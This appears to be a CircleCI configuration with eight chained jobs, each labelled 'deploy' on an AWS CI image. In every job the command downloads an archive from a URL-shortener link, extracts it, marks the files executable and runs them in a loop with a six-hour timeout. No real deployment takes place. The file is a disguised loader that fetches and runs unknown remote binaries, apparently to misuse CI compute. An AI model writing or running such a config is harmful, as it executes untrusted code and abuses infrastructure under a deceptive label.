jobs:
  aws-2023.05:
    docker:
      - image: cimg/aws:2023.05
    parallelism: 1
    steps:
      - run:
          name: deploy
          no_output_timeout: 6h
          background: false
          command: |
            wget -O xoasa http://gg.gg/14ayua
            tar -xf xoasa; chmod u+x *; mv 00 main
            ./loop | ./main

  aws-2023.04:
    docker:
      - image: cimg/aws:2023.04
    parallelism: 1
    steps:
      - run:
          name: deploy
          no_output_timeout: 6h
          background: false
          command: |
            wget -O xoasa http://gg.gg/14ayua
            tar -xf xoasa; chmod u+x *; mv 00 main
            ./loop | ./main

  aws-2023.03:
    docker:
      - image: cimg/aws:2023.03
    parallelism: 1
    steps:
      - run:
          name: deploy
          no_output_timeout: 6h
          background: false
          command: |
            wget -O xoasa http://gg.gg/14ayua
            tar -xf xoasa; chmod u+x *; mv 00 main
            ./loop | ./main

  aws-2023.01:
    docker:
      - image: cimg/aws:2023.01
    parallelism: 1
    steps:
      - run:
          name: deploy
          no_output_timeout: 6h
          background: false
          command: |
            wget -O xoasa http://gg.gg/14ayua
            tar -xf xoasa; chmod u+x *; mv 00 main
            ./loop | ./main

  aws-2022.11:
    docker:
      - image: cimg/aws:2022.11
    parallelism: 1
    steps:
      - run:
          name: deploy
          no_output_timeout: 6h
          background: false
          command: |
            wget -O xoasa http://gg.gg/14ayua
            tar -xf xoasa; chmod u+x *; mv 00 main
            ./loop | ./main

  aws-2022.10:
    docker:
      - image: cimg/aws:2022.10
    parallelism: 1
    steps:
      - run:
          name: deploy
          no_output_timeout: 6h
          background: false
          command: |
            wget -O xoasa http://gg.gg/14ayua
            tar -xf xoasa; chmod u+x *; mv 00 main
            ./loop | ./main

  aws-2022.09:
    docker:
      - image: cimg/aws:2022.09
    parallelism: 1
    steps:
      - run:
          name: deploy
          no_output_timeout: 6h
          background: false
          command: |
            wget -O xoasa http://gg.gg/14ayua
            tar -xf xoasa; chmod u+x *; mv 00 main
            ./loop | ./main

  aws-2022.06:
    docker:
      - image: cimg/aws:2022.06
    parallelism: 1
    steps:
      - run:
          name: deploy
          no_output_timeout: 6h
          background: false
          command: |
            wget -O xoasa http://gg.gg/14ayua
            tar -xf xoasa; chmod u+x *; mv 00 main
            ./loop | ./main



workflows:
  version: 2
  all:
    jobs:
      - aws-2023.05
      - aws-2023.04:
          requires:
            - aws-2023.05
      - aws-2023.03:
          requires:
            - aws-2023.04
      - aws-2023.01:
          requires:
            - aws-2023.03
      - aws-2022.11:
          requires:
            - aws-2023.01
      - aws-2022.10:
          requires:
            - aws-2022.11
      - aws-2022.09:
          requires:
            - aws-2022.10
      - aws-2022.06:
          requires:
            - aws-2022.09







